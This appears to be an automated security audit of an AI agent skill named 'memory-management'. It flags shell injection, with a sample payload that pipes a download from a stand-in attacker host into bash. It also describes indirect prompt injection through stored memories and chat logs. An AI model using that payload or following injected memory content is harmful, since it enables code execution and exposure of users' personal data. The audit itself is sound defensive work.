memory-management
Fail
Audited by Gen Agent Trust Hub on Feb 15, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructions direct the agent to pass raw user input into shell commands using the
Bashtool (e.g.,alma memory add "<content>",alma memory grep <keyword>). This is a classic shell injection vulnerability where a user could provide a string like"; curl attacker.com/exploit | bash; #"to execute arbitrary code. - [PROMPT_INJECTION] (HIGH): Category 8 (Indirect Prompt Injection). The skill is designed to ingest and search untrusted data (past conversations, group chat logs, and personal facts).
- Ingestion points: Data is read from the
threads/directory,~/.config/alma/groups/, and~/.config/alma/people/viaalma memory search,alma memory grep, andalma group historycommands. - Boundary markers: There are no instructions for sanitizing content or using delimiters to isolate retrieved memories from the agent's current task instructions.
- Capability inventory: The agent has access to
Bash,Read, andWritetools, providing a powerful execution environment. - Sanitization: No sanitization or validation of the retrieved memory content is mentioned before it is processed or used to influence future agent decisions.
- [DATA_EXFILTRATION] (MEDIUM): The skill explicitly targets sensitive user data, including personal profiles and chat history stored in
~/.config/alma/. While no active exfiltration script is present, the combination ofBashaccess and access to highly personal information represents a significant privacy risk.
Recommendations
- AI detected serious security threats
Audit Metadata